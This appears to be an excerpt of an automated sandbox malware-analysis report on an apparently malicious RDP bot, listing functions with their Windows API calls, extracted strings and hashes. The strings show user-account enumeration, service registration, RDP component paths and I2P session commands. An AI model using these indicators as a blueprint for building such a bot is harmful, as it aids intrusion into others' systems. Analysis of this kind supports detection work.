Associated: 00000014.00000002.2559534542.00007FFE0E174000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559554043.00007FFE0E17D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559569577.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559586296.00007FFE0E181000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0e160000_main.jbxd

Similarity

API ID: Heap$AllocProcess$Free$AccountBufferEnumErrorLastLocalLookupNameUsermemcpywcslenwcsncpy
String ID: D$[E] (%s) -> LookupAccountNameW failed(gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$users_sync
API String ID: 2122475568-588975189
Opcode ID: 9d059f1f5dd7415c002bfc40bca07d3c4d82ce6738f01354cf924633f6badd35
Instruction ID: bd35fc5699bf01aebff2e05e333e1ada86f5d2a7daa10b81e3bdcda18423152c
Opcode Fuzzy Hash: 9d059f1f5dd7415c002bfc40bca07d3c4d82ce6738f01354cf924633f6badd35
Instruction Fuzzy Hash: 65513AB6A08A4686EB50CF29E44436977A1FB88B88F504137DADE43769DF3CE949C740

Function 00007FFE0E163C6C Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32 ref: 00007FFE0E1638F8
wcsncpy.MSVCRT ref: 00007FFE0E163926
LookupAccountNameW.ADVAPI32 ref: 00007FFE0E163983
GetLastError.KERNEL32 ref: 00007FFE0E163995
wcslen.MSVCRT ref: 00007FFE0E163D0B
GetProcessHeap.KERNEL32 ref: 00007FFE0E163D1B
HeapAlloc.KERNEL32 ref: 00007FFE0E163D2C
GetProcessHeap.KERNEL32 ref: 00007FFE0E163D48
HeapAlloc.KERNEL32 ref: 00007FFE0E163D59
NetApiBufferFree.NETAPI32 ref: 00007FFE0E163D97
NetUserEnum.NETAPI32 ref: 00007FFE0E163E0D
GetProcessHeap.KERNEL32 ref: 00007FFE0E163E4B
HeapAlloc.KERNEL32 ref: 00007FFE0E163E5C
memcpy.MSVCRT ref: 00007FFE0E163E99
GetProcessHeap.KERNEL32 ref: 00007FFE0E163E9E
HeapFree.KERNEL32 ref: 00007FFE0E163EAF

Strings

D, xrefs: 00007FFE0E163915
mem_alloc, xrefs: 00007FFE0E163D6F
users_sync, xrefs: 00007FFE0E1639A0
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFE0E163D76
[E] (%s) -> LookupAccountNameW failed(gle=%lu), xrefs: 00007FFE0E1639A7

Memory Dump Source

Source File: 00000014.00000002.2559487244.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true

Associated: 00000014.00000002.2559462531.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559534542.00007FFE0E174000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559554043.00007FFE0E17D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559569577.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559586296.00007FFE0E181000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0e160000_main.jbxd

Similarity

API ID: Heap$AllocProcess$Free$AccountBufferEnumErrorLastLocalLookupNameUsermemcpywcslenwcsncpy
String ID: D$[E] (%s) -> LookupAccountNameW failed(gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$users_sync
API String ID: 2122475568-588975189
Opcode ID: 1eedadad500edf32e04d263bd9f55e9cc564723da34f8de4d54f81d13fbb1ac2
Instruction ID: 6c88bdfdf5b02dce101cf4c0776355e528af4b8f3ef55cb3f77c4fa0a1c99956
Opcode Fuzzy Hash: 1eedadad500edf32e04d263bd9f55e9cc564723da34f8de4d54f81d13fbb1ac2
Instruction Fuzzy Hash: F2513BB6A08B4686EB50CF29E44436977A1FB88B84F504137DADD43769DF3CE949C740

Function 00007FFE0E163C73 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32 ref: 00007FFE0E1638F8
wcsncpy.MSVCRT ref: 00007FFE0E163926
LookupAccountNameW.ADVAPI32 ref: 00007FFE0E163983
GetLastError.KERNEL32 ref: 00007FFE0E163995
wcslen.MSVCRT ref: 00007FFE0E163D0B
GetProcessHeap.KERNEL32 ref: 00007FFE0E163D1B
HeapAlloc.KERNEL32 ref: 00007FFE0E163D2C
GetProcessHeap.KERNEL32 ref: 00007FFE0E163D48
HeapAlloc.KERNEL32 ref: 00007FFE0E163D59
NetApiBufferFree.NETAPI32 ref: 00007FFE0E163D97
NetUserEnum.NETAPI32 ref: 00007FFE0E163E0D
GetProcessHeap.KERNEL32 ref: 00007FFE0E163E4B
HeapAlloc.KERNEL32 ref: 00007FFE0E163E5C
memcpy.MSVCRT ref: 00007FFE0E163E99
GetProcessHeap.KERNEL32 ref: 00007FFE0E163E9E
HeapFree.KERNEL32 ref: 00007FFE0E163EAF

Strings

D, xrefs: 00007FFE0E163915
mem_alloc, xrefs: 00007FFE0E163D6F
users_sync, xrefs: 00007FFE0E1639A0
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFE0E163D76
[E] (%s) -> LookupAccountNameW failed(gle=%lu), xrefs: 00007FFE0E1639A7

Memory Dump Source

Source File: 00000014.00000002.2559487244.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true

Associated: 00000014.00000002.2559462531.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559534542.00007FFE0E174000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559554043.00007FFE0E17D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559569577.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559586296.00007FFE0E181000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0e160000_main.jbxd

Similarity

API ID: Heap$AllocProcess$Free$AccountBufferEnumErrorLastLocalLookupNameUsermemcpywcslenwcsncpy
String ID: D$[E] (%s) -> LookupAccountNameW failed(gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$users_sync
API String ID: 2122475568-588975189
Opcode ID: dcc62bcad00684de019104841a8f931329f32da96cad2cceaff96aeb97c58103
Instruction ID: b7a7b5279b0cc6e4a0512f896bf786eb8abf507c7f25631b013896d5e4daffaa
Opcode Fuzzy Hash: dcc62bcad00684de019104841a8f931329f32da96cad2cceaff96aeb97c58103
Instruction Fuzzy Hash: 05513BB6A08A4686EB50CF29E44436977A1FB88B84F504137DADD43769DF3CE949C740

Function 00007FFE0E163C88 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32 ref: 00007FFE0E1638F8
wcsncpy.MSVCRT ref: 00007FFE0E163926
LookupAccountNameW.ADVAPI32 ref: 00007FFE0E163983
GetLastError.KERNEL32 ref: 00007FFE0E163995
wcslen.MSVCRT ref: 00007FFE0E163D0B
GetProcessHeap.KERNEL32 ref: 00007FFE0E163D1B
HeapAlloc.KERNEL32 ref: 00007FFE0E163D2C
GetProcessHeap.KERNEL32 ref: 00007FFE0E163D48
HeapAlloc.KERNEL32 ref: 00007FFE0E163D59
NetApiBufferFree.NETAPI32 ref: 00007FFE0E163D97
NetUserEnum.NETAPI32 ref: 00007FFE0E163E0D
GetProcessHeap.KERNEL32 ref: 00007FFE0E163E4B
HeapAlloc.KERNEL32 ref: 00007FFE0E163E5C
memcpy.MSVCRT ref: 00007FFE0E163E99
GetProcessHeap.KERNEL32 ref: 00007FFE0E163E9E
HeapFree.KERNEL32 ref: 00007FFE0E163EAF

Strings

D, xrefs: 00007FFE0E163915
mem_alloc, xrefs: 00007FFE0E163D6F
users_sync, xrefs: 00007FFE0E1639A0
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFE0E163D76
[E] (%s) -> LookupAccountNameW failed(gle=%lu), xrefs: 00007FFE0E1639A7

Memory Dump Source

Source File: 00000014.00000002.2559487244.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true

Associated: 00000014.00000002.2559462531.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559534542.00007FFE0E174000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559554043.00007FFE0E17D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559569577.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559586296.00007FFE0E181000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0e160000_main.jbxd

Similarity

API ID: Heap$AllocProcess$Free$AccountBufferEnumErrorLastLocalLookupNameUsermemcpywcslenwcsncpy
String ID: D$[E] (%s) -> LookupAccountNameW failed(gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$users_sync
API String ID: 2122475568-588975189
Opcode ID: c284144d680ec4523087ec0b6fb13f06a2fc4852147986030773929b24b80cc0
Instruction ID: 78228c381e1b49e26cec74d7172dc70ef9668cb83fc3ac541a6a45e76ca4a212
Opcode Fuzzy Hash: c284144d680ec4523087ec0b6fb13f06a2fc4852147986030773929b24b80cc0
Instruction Fuzzy Hash: 74513AB6A08B4686EB50CF29E44436977A1FB88B88F504137DADE43769DF3CE949C740

Function 00007FFE0EB449BF Relevance: 24.6, APIs: 4, Strings: 10, Instructions: 94COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FFE0EB449D0
OpenSCManagerA.ADVAPI32 ref: 00007FFE0EB449FA
GetLastError.KERNEL32 ref: 00007FFE0EB44A42
GetLastError.KERNEL32 ref: 00007FFE0EB44B1A

Part of subcall function 00007FFE0EB41292: fwrite.MSVCRT ref: 00007FFE0EB4133E
Part of subcall function 00007FFE0EB41292: fflush.MSVCRT ref: 00007FFE0EB4134A

Strings

~, xrefs: 00007FFE0EB44AC0
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE0EB44A2E
[E] (%s) -> OpenSCManagerA(SERVICES_ACTIVE_DATABASE) failed(gle=%lu), xrefs: 00007FFE0EB44B2A
ServicesActive, xrefs: 00007FFE0EB449EE
, xrefs: 00007FFE0EB44A60
P, xrefs: 00007FFE0EB44AC9
[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_scm) failed(gle=%lu), xrefs: 00007FFE0EB44A54
[I] (%s) -> %s, xrefs: 00007FFE0EB44B58
scm_init, xrefs: 00007FFE0EB44A27, 00007FFE0EB44A4D, 00007FFE0EB44B23, 00007FFE0EB44B51
Done, xrefs: 00007FFE0EB44B4A

Memory Dump Source

Source File: 00000014.00000002.2559615479.00007FFE0EB41000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFE0EB40000, based on PE: true

Associated: 00000014.00000002.2559600601.00007FFE0EB40000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559637544.00007FFE0EB56000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559653233.00007FFE0EB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559668361.00007FFE0EB63000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559683911.00007FFE0EB64000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0eb40000_main.jbxd

Similarity

API ID: ErrorLast$CountCriticalInitializeManagerOpenSectionSpinfflushfwrite
String ID: $Done$P$ServicesActive$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_scm) failed(gle=%lu)$[E] (%s) -> OpenSCManagerA(SERVICES_ACTIVE_DATABASE) failed(gle=%lu)$[I] (%s) -> %s$scm_init$~
API String ID: 546114577-3142219161
Opcode ID: dc7b3edb1b96fafe6ace2f878cfc270cb54aaa187ae3b6ec2148f67baf07579a
Instruction ID: 513430eb6ac1e6cff6ac8cc234575a1c6ce3b14a7c1b0d75befee7327d633898
Opcode Fuzzy Hash: dc7b3edb1b96fafe6ace2f878cfc270cb54aaa187ae3b6ec2148f67baf07579a
Instruction Fuzzy Hash: 6B41F791F0C72792FB309F14E8C03B822A4DF05348F605033CAEE862B1AE5DB9A59F45

Function 00007FFE133061A0 Relevance: 24.1, APIs: 10, Strings: 6, Instructions: 104memorysleepCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FFE1330626D
HeapFree.KERNEL32 ref: 00007FFE1330627E
EnterCriticalSection.KERNEL32 ref: 00007FFE133062A2
LeaveCriticalSection.KERNEL32 ref: 00007FFE133062C5
EnterCriticalSection.KERNEL32 ref: 00007FFE13306332
Sleep.KERNEL32 ref: 00007FFE13306351
EnterCriticalSection.KERNEL32 ref: 00007FFE13306363
GetProcessHeap.KERNEL32 ref: 00007FFE13306398
HeapFree.KERNEL32 ref: 00007FFE133063A9
LeaveCriticalSection.KERNEL32 ref: 00007FFE133063B8

Strings

-VRSTVE-, xrefs: 00007FFE133061C5
, xrefs: 00007FFE133061B5
[D] (%s) -> Dispatch an event(size=%u,timestamp=%lld,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s)), xrefs: 00007FFE1330631F
--TSCB--, xrefs: 00007FFE133061D4
routine_tx, xrefs: 00007FFE13306318
KCIT, xrefs: 00007FFE133061BD

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: CriticalSection$Heap$Enter$FreeLeaveProcess$Sleep
String ID: $--TSCB--$-VRSTVE-$KCIT$[D] (%s) -> Dispatch an event(size=%u,timestamp=%lld,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s))$routine_tx
API String ID: 610085118-1825955162
Opcode ID: d395da0cd0e563953e347f6c3e1ff6171209d7113c194856135c7fc65377c92f
Instruction ID: a03f91f7e8cd8508369890db5986722c7142b007c04bbfcd4bfd2aa9154bd12b
Opcode Fuzzy Hash: d395da0cd0e563953e347f6c3e1ff6171209d7113c194856135c7fc65377c92f
Instruction Fuzzy Hash: 44516935A09E42CAE7148B13E84027DB764EFA4BB0F1805B5DA6E27779DF3CE4459348

Function 00007FF6BFD64688 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 154COMMON

Download Yara Rule

APIs

ExpandEnvironmentStringsA.KERNEL32 ref: 00007FF6BFD646BC

Part of subcall function 00007FF6BFD699E2: fwrite.MSVCRT ref: 00007FF6BFD69A8E
Part of subcall function 00007FF6BFD699E2: fflush.MSVCRT ref: 00007FF6BFD69A9A

GetLastError.KERNEL32 ref: 00007FF6BFD6481B

Strings

[I] (%s) -> Done(path=%s,xpath=%s,xpath_sz=%llu), xrefs: 00007FF6BFD646F7
(xpath != NULL), xrefs: 00007FF6BFD6474F
(xpath_sz != NULL), xrefs: 00007FF6BFD6477F
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF6BFD6472A, 00007FF6BFD6475D, 00007FF6BFD6478D, 00007FF6BFD647BD
(path != NULL), xrefs: 00007FF6BFD6471C
H:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF6BFD64715, 00007FF6BFD64748, 00007FF6BFD64778, 00007FF6BFD647A8
fs_path_expand, xrefs: 00007FF6BFD646F0, 00007FF6BFD64723, 00007FF6BFD64756, 00007FF6BFD64786, 00007FF6BFD647B6, 00007FF6BFD647E8, 00007FF6BFD64829, 00007FF6BFD64904
[E] (%s) -> Failed(path=%s,xpath_sz=%llu,err=%08x), xrefs: 00007FF6BFD647EF
[E] (%s) -> ExpandEnvironmentStringsA buffer is too small(path=%s,res=%lu,xpath_sz=%llu), xrefs: 00007FF6BFD6490B
[E] (%s) -> ExpandEnvironmentStringsA failed(path=%s,gle=%lu), xrefs: 00007FF6BFD64830
((*xpath_sz) > 0), xrefs: 00007FF6BFD647AF

Memory Dump Source

Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true

Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd

Similarity

API ID: EnvironmentErrorExpandLastStringsfflushfwrite
String ID: ((*xpath_sz) > 0)$(path != NULL)$(xpath != NULL)$(xpath_sz != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> ExpandEnvironmentStringsA buffer is too small(path=%s,res=%lu,xpath_sz=%llu)$[E] (%s) -> ExpandEnvironmentStringsA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,xpath_sz=%llu,err=%08x)$[I] (%s) -> Done(path=%s,xpath=%s,xpath_sz=%llu)$fs_path_expand
API String ID: 1721699506-2273971785
Opcode ID: fb69f4271079308d6a773b76607419c5d5bd62e2c2092df690b093a9c085742d
Instruction ID: f4e25294ae09135b2780b771e3cc43bbe52302ff400b78b45abc55dc08e18ece
Opcode Fuzzy Hash: fb69f4271079308d6a773b76607419c5d5bd62e2c2092df690b093a9c085742d
Instruction Fuzzy Hash: A4612662A0C547A5FA208FDCE9453B83352AF82758F555732E74DCB2B4DF3CAA468381

Function 00007FFE0EB46C3D Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 134stringtimeCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FFE0EB46C9D
strlen.MSVCRT ref: 00007FFE0EB46CBF
strlen.MSVCRT ref: 00007FFE0EB46CD3
strlen.MSVCRT ref: 00007FFE0EB46D49
strlen.MSVCRT ref: 00007FFE0EB46D65
strlen.MSVCRT ref: 00007FFE0EB46D76
CompareFileTime.KERNEL32 ref: 00007FFE0EB46DD1

Strings

v32.ini, xrefs: 00007FFE0EB46D8B
termsrv3, xrefs: 00007FFE0EB46D7E
%ProgramFiles%\RDP\, xrefs: 00007FFE0EB46D2B
termsrv3, xrefs: 00007FFE0EB46CDB
v32.ini, xrefs: 00007FFE0EB46CE8
TermService, xrefs: 00007FFE0EB46E20

Memory Dump Source

Source File: 00000014.00000002.2559615479.00007FFE0EB41000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFE0EB40000, based on PE: true

Associated: 00000014.00000002.2559600601.00007FFE0EB40000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559637544.00007FFE0EB56000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559653233.00007FFE0EB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559668361.00007FFE0EB63000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559683911.00007FFE0EB64000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0eb40000_main.jbxd

Similarity

API ID: strlen$CompareFileTime
String ID: %ProgramFiles%\RDP\$TermService$termsrv3$termsrv3$v32.ini$v32.ini
API String ID: 342285119-844192579
Opcode ID: 30368236fa65dfd26f33114051efb4c57a2f7cefb1022de13b1530c22006544d
Instruction ID: aa831c8a0f45772ed7ff321e86cebc49aeb8f68307bdae3b20cff4b5e4256a1c
Opcode Fuzzy Hash: 30368236fa65dfd26f33114051efb4c57a2f7cefb1022de13b1530c22006544d
Instruction Fuzzy Hash: 5051B1A1B0C78341FB31AE65A8507BA5791DF867C4F480031DACE4B7AAEE7CE9458F00

Function 00007FFE133067C4 Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 85memorysynchronizationCOMMON

Download Yara Rule

APIs

LeaveCriticalSection.KERNEL32 ref: 00007FFE133067FD
WaitForSingleObject.KERNEL32 ref: 00007FFE1330682C
GetProcessHeap.KERNEL32 ref: 00007FFE13306848
HeapFree.KERNEL32 ref: 00007FFE13306859
EnterCriticalSection.KERNEL32 ref: 00007FFE13306870
EnterCriticalSection.KERNEL32 ref: 00007FFE133068C8
WaitForSingleObject.KERNEL32 ref: 00007FFE133068F4
GetProcessHeap.KERNEL32 ref: 00007FFE13306910
HeapFree.KERNEL32 ref: 00007FFE13306921
LeaveCriticalSection.KERNEL32 ref: 00007FFE13306930

Strings

routine_gc, xrefs: 00007FFE13306810
[I] (%s) -> Client gone(client=0x%llx), xrefs: 00007FFE13306817

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: CriticalHeapSection$EnterFreeLeaveObjectProcessSingleWait
String ID: [I] (%s) -> Client gone(client=0x%llx)$routine_gc
API String ID: 4048354325-2700516951
Opcode ID: f1f7ff5df265827d3a91aa5157ed775dd8634fc87730bdea0f9728a511b8d6c8
Instruction ID: 3e83b0df33ca0d883b40416cdb6f69cb63c5fc1ce647eb6756892abca4470e42
Opcode Fuzzy Hash: f1f7ff5df265827d3a91aa5157ed775dd8634fc87730bdea0f9728a511b8d6c8
Instruction Fuzzy Hash: B341EC25A09E06C9EB549F13D89427822A0EF64F75F1806B5CA3D6A3FADF3CE4549218

Function 00007FFE1150961B Relevance: 21.2, APIs: 4, Strings: 10, Instructions: 181stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FFE115096AE

Part of subcall function 00007FFE11508C26: strcmp.MSVCRT ref: 00007FFE11508C6E

strlen.MSVCRT ref: 00007FFE115097D4
strcpy.MSVCRT ref: 00007FFE115097FB
strcpy.MSVCRT ref: 00007FFE1150989A

Strings

TRANSIENT, xrefs: 00007FFE1150979E
VALUE, xrefs: 00007FFE11509863
SESSION, xrefs: 00007FFE11509764
SESSION CREATE STYLE=STREAM ID=%s DESTINATION=%s SIGNATURE_TYPE=%s %s %s, xrefs: 00007FFE11509722
NAMING, xrefs: 00007FFE11509846
NAMING LOOKUP NAME=ME, xrefs: 00007FFE1150980B
STATUS, xrefs: 00007FFE1150975D
REPLY, xrefs: 00007FFE1150983F
DESTINATION, xrefs: 00007FFE115097B6
RESULT, xrefs: 00007FFE11509756, 00007FFE11509838

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: strcpystrlen$strcmp
String ID: DESTINATION$NAMING$NAMING LOOKUP NAME=ME$REPLY$RESULT$SESSION$SESSION CREATE STYLE=STREAM ID=%s DESTINATION=%s SIGNATURE_TYPE=%s %s %s$STATUS$TRANSIENT$VALUE
API String ID: 245486318-5999096
Opcode ID: b1d516ec78f043b51f4bb9592c15b4c7a3a8f9ece91934b62f30e2b7040c59d9
Instruction ID: 87a67200fd623e8989c67b10776203e6e07dc5ac5df1777e7bd31cf92bd09347
Opcode Fuzzy Hash: b1d516ec78f043b51f4bb9592c15b4c7a3a8f9ece91934b62f30e2b7040c59d9
Instruction Fuzzy Hash: 40718D26E0EE4681EB219AAB991037D2269AF457B4F5403B9DD7D077F9FF3CA9018340

Function 00007FF6BFD68A03 Relevance: 21.1, APIs: 3, Strings: 9, Instructions: 118registryCOMMON

Download Yara Rule

APIs

RegisterServiceCtrlHandlerA.ADVAPI32 ref: 00007FF6BFD68A80
GetLastError.KERNEL32 ref: 00007FF6BFD68AB3

Part of subcall function 00007FF6BFD699E2: fwrite.MSVCRT ref: 00007FF6BFD69A8E
Part of subcall function 00007FF6BFD699E2: fflush.MSVCRT ref: 00007FF6BFD69A9A

Strings

svc_main, xrefs: 00007FF6BFD68ABE, 00007FF6BFD68BAD, 00007FF6BFD68BDD
RDP-Controller, xrefs: 00007FF6BFD68A79
Service running, xrefs: 00007FF6BFD68BA6
[E] (%s) -> RegisterServiceCtrlHandler failed(GetLastError=%lu), xrefs: 00007FF6BFD68AC5
~, xrefs: 00007FF6BFD68B37
[I] (%s) -> %s, xrefs: 00007FF6BFD68BB4, 00007FF6BFD68BE4
Service stopping, xrefs: 00007FF6BFD68BD6
, xrefs: 00007FF6BFD68AD1
P, xrefs: 00007FF6BFD68B40

Memory Dump Source

Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true

Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd

Similarity

API ID: CtrlErrorHandlerLastRegisterServicefflushfwrite
String ID: $P$RDP-Controller$Service running$Service stopping$[E] (%s) -> RegisterServiceCtrlHandler failed(GetLastError=%lu)$[I] (%s) -> %s$svc_main$~
API String ID: 3562457520-1478336053
Opcode ID: 7523986f2e4a8506a5b5db29a01fe4c528107e2010c565d689efa6122ba216ed
Instruction ID: 2d803125aa09eba3a75066dcef2330767858fc106d7e4614c1595d6e2db727b2
Opcode Fuzzy Hash: 7523986f2e4a8506a5b5db29a01fe4c528107e2010c565d689efa6122ba216ed
Instruction Fuzzy Hash: 8251E450F0D603A2FB6057DC94943B833809F18345F204336EB4EDA2F2DE6EA98693D2

Function 00007FFE115090CA Relevance: 21.1, APIs: 9, Strings: 5, Instructions: 94memorystringCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FFE11509111
HeapReAlloc.KERNEL32 ref: 00007FFE11509125
strlen.MSVCRT ref: 00007FFE11509177
GetProcessHeap.KERNEL32 ref: 00007FFE1150919A
HeapFree.KERNEL32 ref: 00007FFE115091AB
GetProcessHeap.KERNEL32 ref: 00007FFE115091BF
HeapAlloc.KERNEL32 ref: 00007FFE115091D0

Part of subcall function 00007FFE11501292: fwrite.MSVCRT ref: 00007FFE1150133E
Part of subcall function 00007FFE11501292: fflush.MSVCRT ref: 00007FFE1150134A

GetProcessHeap.KERNEL32 ref: 00007FFE11509212
HeapFree.KERNEL32 ref: 00007FFE11509223

Strings

